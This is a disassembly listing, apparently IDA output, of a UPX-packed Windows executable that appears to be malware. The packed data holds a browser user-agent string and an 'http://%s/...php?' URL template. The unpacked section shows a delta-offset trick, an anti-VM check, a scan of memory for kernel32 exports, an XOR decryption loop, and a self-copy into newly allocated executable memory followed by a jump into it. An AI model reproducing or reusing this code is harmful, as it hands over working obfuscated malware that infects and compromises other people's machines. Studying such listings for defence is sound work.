dd 0BB0A3D37h, 32BD758Ah, 53D942B3h, 60D8B3F4h, 53BC4906h
dd 0BDB3383Dh, 0EBB17EE6h, 32CE590Fh, 65B068B6h, 0E227A0C1h
dd 0D12A0E65h, 58C22638h, 0D9B9DA18h, 0BB4634B2h, 5E1C0DB9h
dd 0EB05066h, 57125E1Eh, 964EC6F0h, 0C6314CEEh, 0B6413BBBh
dd 2CFD90CCh, 90B650B6h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF2509CDh, 5D32BA1Eh, 44330C69h, 0EC5B3D5Ch, 6A7E6883h
dd 0CC401113h, 84D0A99Bh, 311BFF00h, 661DF805h, 0F4109E46h
dd 0BE511FF0h, 0B048D56Fh, 1472048Dh, 2D0BE981h, 0FD8FEDF5h
dd 17018504h, 0C82BEC73h, 8B0CC48Bh, 0D8088BE1h, 0FF6ED6C8h
dd 435C5004h, 4055C64h, 58D8D800h, 0A3000049h, 420900A8h
dd 6C5D2FCh, 5224F102h, 80314153h, 0FFFFFFC8h, 0F50101DDh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 5E1A9544h, 0FFFFFFE8h, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 377FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 49534D20h, 0ED6FFFF7h, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 2EECF734h, 0C7E445h
dd 0C40104D4h, 0F7DF0EB4h, 90A0CF3Ch, 68047480h, 0CF3D580Eh
dd 48097CF3h, 30D4743Ch, 9364DF3Ch, 10222045h, 0B600304Ah
dd 0F8F90DFFh, 76631340h, 75722E76h, 0D8DB777Eh, 700D6F6h
dd 976C6465h, 0C1660F65h, 0EDFFCA65h, 616573FDh, 0E686372h
dd 626F721Fh, 6863786Fh, 6F676E61h, 0D2E6EDFFh, 0C74651Fh
dd 622E6472h, 61007A69h, 6B686328h, 91B61762h, 740C6D61h
dd 24782D06h, 0E6EDB6CDh, 6F6C0600h, 6B37620Eh, 0FBDBF647h
dd 27626B6h, 76742E7Ah, 6F74111Bh, 176E2E70h, 30B60215h
dd 27730F69h, 3FC2E33h, 0F788DB6h, 6C756461h, 4B652D74h
dd 6DDB7269h, 3380CDFBh, 73A66E6Fh, 622E744Eh, 2B01F767h
dd 67694F7Ch, 77780032h, 0FECE2C61h, 626AED6Dh, 9B00AD62h
dd 6166617Ah, 221F2EA8h, 655DDBE1h, 61AF5C23h, 0F1646362h
dd 65FFDBB7h, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FF7A7978h, 54BFFFF2h, 44434241h, 48474645h, 4C4B4A49h
dd 504F4E4Dh, 56555451h, 5A595857h, 1B9BFBF8h, 49642563h
dd 6F530044h, 5C9E7466h, 706C694Dh, 0F90656BBh, 0DA575C0Dh
dd 0FE007374h, 4774E30Fh, 74684F31h, 2F3A7074h, 0C273252Fh
dd 0BC0EE6Fh, 2EC3912Fh, 3F706870h, 0EDF9ED3Ah, 260F3DDBh
dd 66E6373h, 6E692664h, 0F3B7666h, 3DF6EC76h, 13263032h
dd 0EB373D74h, 32313958h, 0BF87B237h, 3101D06Bh, 3030383Ah
dd 0DF07652Fh, 80FFFF00h, 5DDF1030h, 0B966C933h, 758D01EEh
dd 8AFE8B05h, 6FFFE206h, 7993CDBh, 302C0646h, 88993446h
dd 0EDE24707h, 0DAE80AEBh, 0B46FF7FEh, 676507DFh, 9993712Eh
dd 0FD1201C9h, 16FD91BDh, 0DFFFEFF7h, 6872C107h, 66FD42AAh
dd 0BA10FDAAh, 98A91C14h, 98F3C91Ah, 0FFB308F1h, 2865BB1h
dd 9010C071h, 9237CB5Fh, 781C9659h, 0F93ED3Ah, 57E414FBh
dd 3A0A7D71h, 9DF34571h, 9D2304F1h, 989BEFBh, 119C04F1h
dd 0EF67B340h, 0F3FD8EEDh, 1C10F0E3h, 59B20BDCh, 25C99B60h
dd 3D8F9601h, 414D9F6h, 71CA17A1h, 688D2B9Eh, 0EDAD9161h
dd 1A4637B3h, 111D960Ah, 0C850B228h, 6D9FED00h, 0DC14996Fh
dd 12255557h, 91C0A44Eh, 0FD994912h, 0EDDEDFECh, 140054F7h
dd 0CBCA3AC4h, 0FF1C3B71h, 6C21E424h, 1ADD87B3h, 8FCDCDCFh
dd 3F812C66h, 0FBB66F1Eh, 0B8B0FB9Fh, 12CDC383h, 0CBC9A85Dh
dd 7F64251Dh, 24AD9DB2h, 0A6485A0Bh, 0B314C096h, 1BC9FECBh
dd 0EBA7294Ch, 0E9BA9CF3h, 0D9FFF716h, 26F434F7h, 0EFCF571h
dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 766FFFEFh, 16A0A8ECh
dd 0FFC5B701h, 0E9ECE9EDh, 0E1FCB7FDh, 0FBBFD2Ch, 0F5CA0161h
dd 0F25AFCFCh, 0FCF7EBFCh, 0FFABAAF5h, 0D6BFFFE5h, 0AAF934C7h
dd 2A25B459h, 0ACC9662Ah, 0B7819093h, 83639D90h, 9271CDC9h
dd 67F0BEECh, 3519BF30h, 95D91451h, 2A91720Ah, 0FFFBC871h
dd 0D2EB20FFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah
dd 474A9A8Bh, 46FEDFFFh, 9BAB9EEBh, 20A319DBh, 0DDA26CECh
dd 9EED85BDh, 81E8A2DFh, 0FDBFFFCDh, 125544EBh, 961FBDC8h
dd 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 0BBF8105Ah, 960B09FFh
dd 664922D0h, 12FEFD7Fh, 0C25AA987h, 6EDB4095h, 1285026Fh
dd 5A910482h, 9CFF7CBh, 0A767F9B9h, 4D53FF85h, 53187242h
dd 0F4BFFFC8h, 62FEFFCFh, 43500200h, 575445ABh, 204B524Fh
dd 474F5250h, 0ED624152h, 204DE35Bh, 4C17CD31h, 24D4E41h
dd 0EB52B70Ah, 3D66D390h, 676B03DFh, 4BB696EBh, 0E707587h
dd 27611A33h, 1F2A234Dh, 583274B6h, 32323221h, 5833312Eh
dd 18FE66D3h, 8B323C20h, 0C95A25A4h, 7A0773C8h, 0DBEC1B1Ah
dd 23FF0Ch, 140A1104h, 0DD40520h, 185DADEh, 4B4C0069h
dd 68505353h, 4BE48F6h, 8829772h, 240057E0h, 0EB605DCDh
dd 6F30006Eh, 3A73009Dh, 7B7B2274h, 90130B1h, 3500398Ch
dd 7301B223h, 72E1D5Bh, 0C9ABDA00h, 8273C80h, 0EC57DA20h
dd 9F324E24h, 461A0003h, 6407923h, 4007471Bh, 45060006h
dd 101B9FFFh, 8A151F01h, 48E088h, 444004Fh, 292FFFF6h
dd 0F27A6A19h, 281C49E4h, 742530AFh, 0E1536710h, 4DF214F2h
dd 3075DF5Ch, 0BAF70400h, 75CDAE6h, 5C085ABDh, 0D8DD4D61h
dd 72E5DC8h, 2E380036h, 491B3077h, 0B62E6CECh, 1043EC00h
dd 0E5633F00h, 6439E403h
dd 4DC08A2h, 0B7FC83D8h, 0FF1640h, 0E00DEDEh, 19F1600h
dd 26FD2602h, 2840484Ch, 6110319h, 8BF70D1Bh, 0D374D96Ch
dd 90A5C370h, 9C2AB2EFh, 6077256Bh, 109FB6CFh, 1B04480Eh
dd 0B73E1354h, 5A545D75h, 22596326h, 45CBC75Ch, 0E7FCD20Fh
dd 58765h, 4810030Bh, 0FFB810B8h, 0E7B17FFh, 286A050Bh
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 0FF85F62Eh, 5D5FF5B1h
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 0B9F2D160h, 0F40C5EC8h
dd 0CA060A3h, 5790F200h, 0CB10CA0h, 0C8E4EFFBh, 880CA000h
dd 90040h, 0EC0703ECh, 0E49E11h, 4F401495h, 0BF40707Ch
dd 1B2297B2h, 13430700h, 23FF09E7h, 138578h, 0E9A65BABh
dd 63F81013h, 2F90273Ch, 230EFEFFh, 60C30740h, 8408E651h
dd 0F74F9388h, 10B94349h, 0B801FFEEh, 0E4D98710h, 0AD200CC9h
dd 7C7F070Dh, 0FC85796h, 700118D8h, 3E400F84h, 0F8495E4h
dd 36000F95h, 21BF279h, 6C0F847Fh, 0AB7B000Fh, 0A89A1E12h
dd 0FF13436Fh, 1F223024h, 50586E69h, 6C725020h, 2B029Bh
dd 39014446h, 0F2113F24h, 123C6B32h, 0EC027515h, 41F21035h
dd 941C0053h, 72BFFE01h, 0C606EB88h, 73255C5Ch, 6370695Ch
dd 0FFE5D424h, 0EC81666Fh, 0E4FF071Ch, 44655300h, 67756265h
dd 0E8DF7669h, 67ADD463h, 6A6441CFh, 6F548975h, 0DB92656Bh
dd 176EB266h, 126F4C73h, 0FD1C7075h, 61567F76h, 4165756Ch
dd 28704F17h, 2C77636Fh, 34C6A475h, 61766B00h, 0DF053367h
dd 75E318D4h, 39316DCDh, 0FE6A322Dh, 9F5A3A37h, 72545F6Ch
dd 6E577961h, 96DD4364h, 61AF36DAh, 6F94521Eh, 0AD685405h
dd 0CCEA354h, 7C45614h, 0BA99B65Ch, 532841B5h, 3EA37845h
dd 0FA34356Eh, 0F54BB3D2h, 544822F3h, 7D835054h, 404B46A9h
dd 4F6C9C20h, 0BB0A0D4Bh, 1EF52B5h, 244CB4Bh, 0CA044C2Dh
dd 676ADF66h, 25203A59h, 0DA2F1875h, 28587B5Ah, 26B97954h
dd 6D5A70A7h, 63B2B6A6h, 2E2F15AFh, 8EA9EE56h, 72BF2DCBh
dd 59B4CBCDh, 4757B18Bh, 1E3FC304h, 372A942Dh, 0F1640200h
dd 0E95FED0Bh, 6D9573D7h, 0B1637673h, 2DDF77D7h, 25692D5Eh
dd 175F320Fh, 98B73475h, 7BD2F6Bh, 38393103h, 0D34D34DBh
dd 34353637h, 75236933h, 7DCE9A6h, 2F313203h, 0DEF60C39h
dd 3837D9h, 37073B43h, 8320C832h, 0C8343536h, 330C8320h
dd 93523132h, 0FB8B2CD4h, 0B7F9E03Ah, 0C7EDB58Ah, 54464F47h
dd 45524157h, 9163F0Dh, 75435CD7h, 56297272h, 6C378442h
dd 5C1E73E8h, 0B36E7552h, 0D0B6ED37h, 0EA6F74E2h, 20306838h
dd 7FF81B53h, 0FB0F1A14h, 736E6753h, 796A7264h, 0CB564472h
dd 7E741768h, 0B9AAEAA7h, 5F7A43C2h, 0CE23h, 4C10E147h
dd 47136055h, 535E01BBh, 9E432053h, 0D5762067h, 0ADBD9B53h
dd 945876DCh, 7C23B532h, 2D82F642h, 0E3471A1Bh, 23CB7337h
dd 79931217h, 0A35A8473h, 4200F1B1h, 75D72077h, 0BDADB023h
dd 6D1B13C5h, 0DD975220h, 0A5B73772h, 2044180Dh, 2F662620h
dd 2D856D67h, 2AAC73D9h, 22632463h, 0FED722D9h, 20797469h
dd 1E6E614Dh, 1831F81Ah, 420000Ch, 15455D12h, 0FB2493C4h
dd 0C0017119h, 65657246h, 0B7E00D0Ch, 470DCD47h, 6F4D7465h
dd 2F14BF87h, 434665C5h, 406D614Eh, 74736C01h, 35DEF772h
dd 0A956380h, 79706F43h, 0E1480A19h, 456102DEh, 22326578h
dd 0F8A5FFEDh, 6C6F6F54h, 3233703Bh, 70616E53h, 746F6873h
dd 9B5BBA19h, 32127414h, 540F7372h, 235AE60Bh, 182C35A3h
dd 0F60B6C21h, 78654E01h, 41616974h, 16BFFB54h, 0CF76453Ch
dd 7469616Bh, 53726F46h, 0ED74423Ch, 4F7B676Dh, 2C766A62h
dd 0E025A144h, 8D22B59Bh, 0CD964CB7h, 45DB76CDh, 2F725072h
dd 48196972h, 0EF64BDD6h, 486573FDh, 0C646E61h, 886C3255h
dd 8B61B59h, 4618E06Eh, 46D735F1h, 64B14465h, 59498B4Bh
dd 530C1BC0h, 64656B1Dh, 0ADDD1F45h, 1270B36Dh, 661D4061h
dd 1153246Fh, 96EC9B3h, 6EC17065h, 25CFF64Bh, 12EE9E9Bh
dd 6464410Bh, 0EF660F72h, 4CD9221Bh, 61726269h, 0CD15B567h
dd 4D2BC1B5h, 6C137C82h, 0BB961016h, 8763CF9Ch, 54F685B5h
dd 75969869h, 2B4DDE65h, 0B15B092h, 0B4B44278h, 0D366C37h
dd 0E539AF5Dh, 5D22CC21h, 78456862h, 66C25B6Dh, 630AF631h
dd 373C6D13h, 522D8DC1h, 87B591Bh, 2ECD82ADh, 38657A94h
dd 9F9D5B5Ch, 2CD1937Dh, 654B9367h, 0EC3B4579h, 7810CE40h
dd 0A510F99h, 5AC25EC0h, 309011E8h, 426C5987h, 0D21021E7h
dd 7B70A107h, 62410C51h, 6853B024h, 688D0E29h, 0FF78F1F6h
dd 0D9851AC1h, 10892877h, 7DB662BBh, 6112440Ah, 6669320Eh
dd 0B63AD61Bh, 8F67BC79h, 6C362B75h, 436F616Fh, 2C796FC0h
dd 23506F11h, 52106770h, 3F900E8Fh, 0B4A438F6h, 71634114h
dd 70726975h, 4DD874AEh, 3AA03549h, 59A7C336h, 73ECDE13h
dd 6D06BC72h, 0D1CE18B1h, 840E27B2h, 99DA150Fh, 1D4D536Bh
dd 0C54A445Fh, 3FB8740Ah, 0C5E8685Fh, 6EC46D27h, 0AD0702CDh
dd 880D696Fh, 660AD172h, 14E955B3h, 40288901h, 0F3488CD3h
dd 0CC652D15h, 0EC0CC362h, 0E10A1415h, 0DF26106Eh, 776C49ACh
dd 0C20B7073h, 0B75BB669h, 0F44F4166h, 3DB6FC28h, 8B2C2834h
dd 1141A155h, 16C05212h, 6A615F0Eh, 6B14C370h, 0C9416E09h
dd 3BB86658h, 1A877453h, 0F5135B3Fh, 7940EB45h, 2C020273h
dd 0D2CB2CBh, 346F3901h, 0B2CB2CB2h, 4090C17h, 2AA4F413h
dd 141610CBh, 7C834550h, 74EC4AABh, 40E07ED2h, 0CE8011E0h
dd 10F00FDh, 0BE06010Bh, 6ABA120Ch, 0EFCB20ECh, 31431024h
dd 0BA4B020Bh, 7283259h, 364600Ch, 341E733Bh, 8060710h
dd 37B39609h, 0E33F8C2Fh, 6405DB0Ah, 2E1E0180h, 0B06C0C5Bh
dd 263207DDh, 0DBC42890h, 7D0483E3h, 642EE004h, 6E54FBE7h
dd 1221DD21h, 162C27h, 0C08574BEh, 0C9314648h, 54h, 0
align 10h
pusha
mov esi, offset dword_31436000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31437CA2
; ---------------------------------------------------------------------------
align 8
loc_31437C98: ; CODE XREF: UPX1:loc_31437CA9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31437C9E: ; CODE XREF: UPX1:31437D36�j
; UPX1:31437D4D�j
add ebx, ebx
jnz short loc_31437CA9
loc_31437CA2: ; CODE XREF: UPX1:31437C90�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CA9: ; CODE XREF: UPX1:31437CA0�j
jb short loc_31437C98
mov eax, 1
loc_31437CB0: ; CODE XREF: UPX1:31437CBF�j
; UPX1:31437CCA�j
add ebx, ebx
jnz short loc_31437CBB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CBB: ; CODE XREF: UPX1:31437CB2�j
adc eax, eax
add ebx, ebx
jnb short loc_31437CB0
jnz short loc_31437CCC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31437CB0
loc_31437CCC: ; CODE XREF: UPX1:31437CC1�j
xor ecx, ecx
sub eax, 3
jb short loc_31437CE0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31437D52
mov ebp, eax
loc_31437CE0: ; CODE XREF: UPX1:31437CD1�j
add ebx, ebx
jnz short loc_31437CEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CEB: ; CODE XREF: UPX1:31437CE2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31437CF8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CF8: ; CODE XREF: UPX1:31437CEF�j
adc ecx, ecx
jnz short loc_31437D1C
inc ecx
loc_31437CFD: ; CODE XREF: UPX1:31437D0C�j
; UPX1:31437D17�j
add ebx, ebx
jnz short loc_31437D08
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437D08: ; CODE XREF: UPX1:31437CFF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31437CFD
jnz short loc_31437D19
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31437CFD
loc_31437D19: ; CODE XREF: UPX1:31437D0E�j
add ecx, 2
loc_31437D1C: ; CODE XREF: UPX1:31437CFA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31437D3C
loc_31437D2D: ; CODE XREF: UPX1:31437D34�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31437D2D
jmp loc_31437C9E
; ---------------------------------------------------------------------------
align 4
loc_31437D3C: ; CODE XREF: UPX1:31437D2B�j
; UPX1:31437D49�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31437D3C
add edi, ecx
jmp loc_31437C9E
; ---------------------------------------------------------------------------
loc_31437D52: ; CODE XREF: UPX1:31437CDC�j
pop esi
mov edi, esi
mov ecx, 86h
loc_31437D5A: ; CODE XREF: UPX1:31437D61�j
; UPX1:31437D66�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31437D5F: ; CODE XREF: UPX1:31437D84�j
cmp al, 1
ja short loc_31437D5A
cmp byte ptr [edi], 1
jnz short loc_31437D5A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31437D5F
lea edi, [esi+5000h]
loc_31437D8C: ; CODE XREF: UPX1:31437DAE�j
mov eax, [edi]
or eax, eax
jz short loc_31437DD7
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31437DA9: ; CODE XREF: UPX1:31437DCF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31437D8C
mov ecx, edi
jns short near ptr loc_31437DBA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31437DBA: ; CODE XREF: UPX1:31437DB2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31437DD1
mov [ebx], eax
add ebx, 4
jmp short loc_31437DA9
; ---------------------------------------------------------------------------
loc_31437DD1: ; CODE XREF: UPX1:31437DC8�j
call dword ptr [esi+7094h]
loc_31437DD7: ; CODE XREF: UPX1:31437D90�j
popa
jmp loc_314324EF
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00021000 ( 135168.)
; Section size in file : 00021000 ( 135168.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31438000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h
dword_31438090 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; UPX2:3144F089�r
dd 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 0C3906893h, 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 427500F8h
dd 0E8h, 0ED815D00h, 402338h, 2385858Bh, 85030040h, 40238Dh
dd 858BF08Bh, 402389h, 238D8503h, 60500040h, 0C933FE8Bh
dd 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h, 7C004023h
dd 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h, 60000387h
dd 7C800000h, 0
dd 1E003143h, 300000h, 75Ch dup(0)
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_3143A04D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_3143A041
mov ebx, [eax+29C1h]
jmp short loc_3143A04B
; ---------------------------------------------------------------------------
loc_3143A041: ; CODE XREF: UPX2:3143A037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_3143A04B: ; CODE XREF: UPX2:3143A03F�j
mov ebx, [ebx]
loc_3143A04D: ; CODE XREF: UPX2:3143A01F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1E05h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 78h
rep movsb
sldt cx
test ecx, ecx
jnz short loc_3143A07B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_3143A07B: ; CODE XREF: UPX2:3143A074�j
and ebx, 0FFFFF000h
loc_3143A081: ; CODE XREF: UPX2:3143A090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_3143A092
loc_3143A08A: ; CODE XREF: UPX2:3143A09F�j
sub ebx, 100h
jnz short loc_3143A081
loc_3143A092: ; CODE XREF: UPX2:3143A088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3143A08A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3143A0AC: ; CODE XREF: UPX2:loc_3143A0C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_3143A0C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3143A0C5
loc_3143A0C0: ; CODE XREF: UPX2:3143A0B5�j
loop loc_3143A0AC
pop ecx
jmp short loc_3143A0F0
; ---------------------------------------------------------------------------
loc_3143A0C5: ; CODE XREF: UPX2:3143A0BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_3143A137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143A17E
loc_3143A0F0: ; CODE XREF: UPX2:3143A0C3�j
; sub_3143A17E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_3143A11C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_3143A11C: ; CODE XREF: sub_3143A17E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3143A17E
; ---------------------------------------------------------------------------
db 0CCh
db 0DBh
; =============== S U B R O U T I N E =======================================
sub_3143A120 proc near ; CODE XREF: sub_3143C45B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_3143A128: ; CODE XREF: sub_3143A120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3143A128
pop ebx
retn
sub_3143A120 endp
; ---------------------------------------------------------------------------
loc_3143A137: ; CODE XREF: UPX2:3143A0EE�j
call near ptr loc_3143A146+2
inc ebx
insb
outsd
jnb short near ptr loc_3143A1A3+3
dec eax
popa
outsb
db 64h
insb
loc_3143A146: ; CODE XREF: UPX2:loc_3143A137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_3143A162+1
inc ebx
jb short loc_3143A1BE
popa
jz short near ptr loc_3143A1C0+1
inc ebp
jbe short near ptr loc_3143A1C0+4
outsb
jz short loc_3143A1A3
loc_3143A162: ; CODE XREF: UPX2:3143A151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_3143A17E
inc edi
db 65h
jz short near ptr loc_3143A1C0+1
popa
jnb short near ptr loc_3143A1EA+2
inc ebp
jb short near ptr loc_3143A1EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3143A17E proc near ; CODE XREF: UPX2:3143A16C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 3143A0F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 3143A534 SIZE 0000000B BYTES
push ebx
call esi ; lstrcatA
mov [ebp+103E6Ah], eax
call sub_3143A55F
test eax, eax
jz loc_3143A0F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_3143A534
loc_3143A1A3: ; CODE XREF: UPX2:3143A160�j
; UPX2:3143A13F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_3143A1C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_3143A1BE: ; CODE XREF: UPX2:3143A157�j
jmp short loc_3143A1C7
; ---------------------------------------------------------------------------
loc_3143A1C0: ; CODE XREF: sub_3143A17E+2C�j
; UPX2:3143A15A�j ...
and dword ptr [ebp+101598h], 0
loc_3143A1C7: ; CODE XREF: sub_3143A17E:loc_3143A1BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_3143A1EA: ; CODE XREF: UPX2:3143A176�j
; UPX2:3143A179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_3143A59C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_3143A2E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_3143A534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_3143A534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_3143A534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_3143A2D3
jmp loc_3143A534
; ---------------------------------------------------------------------------
loc_3143A2D3: ; CODE XREF: sub_3143A17E+14B�p
; sub_3143A17E+162�j
push 1
pop ecx
jecxz short locret_3143A2E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_3143A2D3
; ---------------------------------------------------------------------------
locret_3143A2E2: ; CODE XREF: sub_3143A17E+158�j
retn
; ---------------------------------------------------------------------------
loc_3143A2E3: ; CODE XREF: sub_3143A17E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_3143A534
call near ptr loc_3143A2FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3143A2FA: ; CODE XREF: sub_3143A17E+172�p
add bh, bh
sub_3143A17E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_3143A59C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_3143A534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_3143A534
mov ecx, [ebp+103F06h]
jecxz short loc_3143A383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_3143A383
